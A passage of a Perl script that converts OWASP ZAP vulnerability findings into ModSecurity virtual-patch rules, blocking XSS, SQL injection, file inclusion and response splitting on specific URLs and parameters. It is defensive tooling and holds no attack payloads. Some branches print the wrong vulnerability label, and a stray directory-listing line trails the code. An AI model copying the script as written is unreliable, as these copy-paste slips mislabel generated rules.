$current_type\n"; if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ parseData(to_string($current_type)); }else { print "Vulnerability Type: $type is not supported in this version.\n"; $num_not_supported++; } $vuln_count++; } close($MODSEC_RULES); print "==================================================================================================\n"; print "\n\n************ END OF SCRIPT RESULTS *****************\n"; print "Number of Vulnerabilities Processed: $vuln_count\n"; print "Number of ModSecurity rules generated: $num_rules_generated\n"; print "Number of Unsupported vulns skipped: $num_not_supported\n"; print "Number of bad URLs (rules not gen): $num_bad_urls\n"; print "****************************************************\n\n"; print "----------------------------------------------------\n"; print "To activate the virtual patching file ($modsec_rules_file),\n"; print "copy it into the CRS \"base_rules\" directory and then create\n"; print "a symlink to it in the \"activated_rules\" directory.\n"; print "-----------------------------------------------------\n\n"; ############### # Subroutines # ############### sub parseData { my($vuln_str) = @_; my $vuln_detail_filename; my $current_vuln_xml; my $current_vuln_url; my $current_vuln_param; my $current_uricontent; my @current_params; my $id = $vuln_count; print "Found a $vuln_str vulnerability.\n"; $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); $current_vuln_url = $url[$vuln_count]; print URL_LIST "$current_vuln_url\n"; # Validate url (need seperate sub?) print "Validating URL: $current_vuln_url\n"; if(is_uri(to_string($current_vuln_url))){ print "URL is well-formed\n"; print "Continuing Rule Generation\n"; } else { print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; $num_bad_urls++; # Waits for keypress in test mode so you can # see why the URL failed validation. if($test_mode){ wait_for_keypress(); } return; } $current_uricontent = get_uricontent($current_vuln_url); # Only need param if XSS attack,SQLINJ,XPATH # and maybe for HTTPRS, DT. # NOT for PRL and DI if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ @current_params = $param[$vuln_count]; } if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ print "Current vulnerable Param(s): @current_params\n"; } generate_patch($vuln_str,$current_uricontent,@current_params); } sub generate_patch { my($type,$uricontent,@params,$current_vuln_xml) = @_; my $rule = ""; $id = "1".$vuln_count; switch($type) { case ($VULN_CLASS_XSS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ # Check to see if each vulnerable parameter is valid # then generate a rule using both uricontent and the # parameter $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_BLIND_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_LFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_RFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_HTTPRS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } } } sub get_uricontent { my($url) = @_; my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; # First, trim the first part out of the URL: # http://.../ $url =~ /$regex/; substr($url,index($url,$&),length($&)) = ""; # If the URL contains a php or cgi query with # one or more params and values, trim those out. # Trim from the question mark to the end. if($url =~ /\?/){ substr($url,index($url,"?")) = ""; } return $url; }
[ICO]NameLast modifiedSizeDescription
[DIR]Parent Directory   -
[DIR]03.17/ 21-Jul-2007 17:20 -